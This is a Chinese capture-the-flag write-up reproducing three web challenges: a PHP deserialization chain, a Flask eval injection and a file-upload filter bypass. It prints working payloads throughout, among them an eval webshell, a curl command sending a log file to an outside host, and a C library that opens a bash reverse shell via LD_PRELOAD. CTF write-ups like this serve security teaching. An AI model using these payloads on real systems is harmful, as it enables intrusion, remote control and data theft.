ezpop

<?phpclass crow
{public $v1;public $v2;function eval() {echo new $this->v1($this->v2);}public function __invoke(){$this->v1->world();}
}class fin
{public $f1;public function __destruct(){echo $this->f1 . '114514';}public function run(){($this->f1)();}public function __call($a, $b){echo $this->f1->get_flag();}}class what
{public $a;public function __toString(){$this->a->run();return 'hello';}
}
class mix
{public $m1;public function run(){($this->m1)();}public function get_flag(){eval('#' . $this->m1);}}if (isset($_POST['cmd'])) {unserialize($_POST['cmd']);
} else {highlight_file(__FILE__);
}

反序列化，修改crow中v1的值，利用crow中的eval跳到mix中，利用eval函数来执行命令。

利用链：

fin::__destruct->what::__toString->fin::_run->crow::__invoke->fin::_call->mix::get_flag

Exp：

<?phpclass crow{public $v1;public $v2;public function __construct(){$this->v1=new fin();$this->v1->f1=new mix();$this->v1->f1->m1="?><?=eval(\$_POST[1]);";}}class fin{public $f1;public function __construct(){$f1=$this->f1;}}class what{public $a;public function __construct(){$this->a=new fin();$this->a->f1=new crow();}}class mix{public $m1;public function __construct(){$m1=$this->m1;}}$a=new fin();$a->f1=new what();echo serialize($a);

payload：（蚁剑的密码）

cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1

然后cat找flag即可。

Calc：

源码：

#coding=utf-8from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directoryimport randomfrom urllib import parseimport osfrom werkzeug.utils import secure_filenameimport timeapp=Flask(__name__)def waf(s):blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']flag = Truefor no in blacklist:if no.lower() in s.lower():flag= Falseprint(no)breakreturn flag@app.route("/")def index():"欢迎来到SUctf2022"return render_template("index.html")@app.route("/calc",methods=['GET'])def calc():ip = request.remote_addrnum = request.values.get("num")log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)if waf(num):try:data = eval(num)os.system(log)except:passreturn str(data)else:return "waf!!"if __name__ == "__main__":app.run(host='0.0.0.0',port=5000)

提交时会请求/calc路由并提交num参数，源码中当访问calc路由后会进入calc函数，接收num参数，拼接到log里面，再经过waf函数，没有被过滤会先执行eval，然后执行system函数。

Waf中过滤了括号，但没有禁用反引号，所以可以执行system函数。

Payload：

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:6666/%23ls

?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:6666/%23cat%09Th1s*

Upgdstore：

过滤了一大堆函数，只有少数几个可以用。

base64_decode没有被过滤，可以利用show_source查看源码。

<?phpbase64_decode("c2hvd19zb3VyY2U=")("index.php");得到源码：<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">嘿伙计，传个火？！<input class="input_file" type="file" name="upload_file"/><input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{$blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];foreach($blacklist as $blackword){if(strstr($var, $blackword)) return True;}return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}$content = file_get_contents($temp_file);
if(fun($content)){die("诶，被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;$img_path = UPLOAD_PATH . '/' . $new_file_name;if (move_uploaded_file($temp_file, $img_path)){$is_upload = true;} else {$msg = 'Upload Failed!';die();}echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

strstr()函数对大小写敏感，可以利用大小写绕过waf。

利用base64先上传一句话木马。

<?php @eval($_POST['a']);?>#f82ffc0257783176e9c79a42e32657d0.php

再上传一个php文件使用include来包含刚刚的一句话，利用伪协议对base64进行解码。

cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2Y4MmZmYzAyNTc3ODMxNzZlOWM3OWE0MmUzMjY1N2QwLnBocA==

<?phpInclude(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2Y4MmZmYzAyNTc3ODMxNzZlOWM3OWE0MmUzMjY1N2QwLnBocA=="));

之后上传上传exp.c和gconv-modules

构造恶意的exp.c

#include <stdlib.h>#include <stdio.h>#include <string.h>void payload(){system("bash -c 'exec bash -i &>/dev/tcp/ip/6666 <&1'");}int geteuid(){if (getenv("LD_PRELOAD") == NULL){return 0;}unsetenv("LD_PRELOAD");payload();}

然后编译成so文件。

利用move_uploaded_file进行文件上传

然后访问反弹shell。

a=putenv("LD_PRELOAD=/var/www/html/uploads/exp.so");mail("","","","","");

2022DASCTF X SU 三月春季挑战赛 web复现相关推荐

2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做第一种:利用magic_gadget修改got表中setvbuf的值在64位程序的_do_global_dtors_aux中有这么 ...
2022DASCTF Apr X FATE 防疫挑战赛部分web复现
warmup-php 一个PHP代码审计审计题,给的代码量有点大,第一眼看下去容易劝退,分别有四个文件. Base.php<?phpclass Base {public function __g ...
2022DASCTF Apr X FATE 防疫挑战赛复现
misc 第二题: wireshark打开直接搜字符串flag,发现4个字段含有flag,其中一个发现是zip文件,想把它提取出来, 将他数据导入一个新的zip文件,打开在50段找到密码加密字段,找 ...
2022 lineCTF WEB复现WriteUp
lineCTF WEB复现WriteUp Gotm is_admin == true就给flag,需要伪造token,需要秘钥才行再往下看,经典SSTI 如果能控制acc也就是id为{{.}},就能 ...
i春秋2020新春公益赛WEB复现Writeup
i春秋2020新春公益赛WEB复现Writeup 说实话这个比赛打的我是一点毛病都没有,还是觉得自己掌握的东西太少了,,, 尤其是sql注入,都被大佬们玩出花来了,可能自己太菜,,,哭了!!! 关于S ...
2022DASCTF Apr X FATE 防疫挑战赛
2022DASCTF Apr X FATE 防疫挑战赛 easy_real import random import hashlib from gmpy2 import * from libnum i ...
DASCTF x SU 春季挑战赛
DASCTF x SU三月赛复现 0x01 MISC 月圆之夜什么奇奇怪怪的东西 0x02 WEB ezpop calc upgdstore 0x01 MISC 月圆之夜这个直接B站上就行,有专门 ...
2022DASCTF Apr X FATE 防疫挑战赛WP
NEFU-NSILAB下Maple战队分队于4月23日10:00 - 18:00所产您也可以点击此处观看文章目录队伍信息解题情况 Crypto special_rsa 题目总代码 easy_ ...
[NSSCTF][SCTF 2021]WEB复现
感谢NSSCTF提供复现环境 loginme middleware.go package middlewareimport ("github.com/gin-gonic/gin" ...

2022DASCTF X SU 三月春季挑战赛 web复现

ezpop

Calc：

Upgdstore：

2022DASCTF X SU 三月春季挑战赛 web复现相关推荐

最新文章

热门文章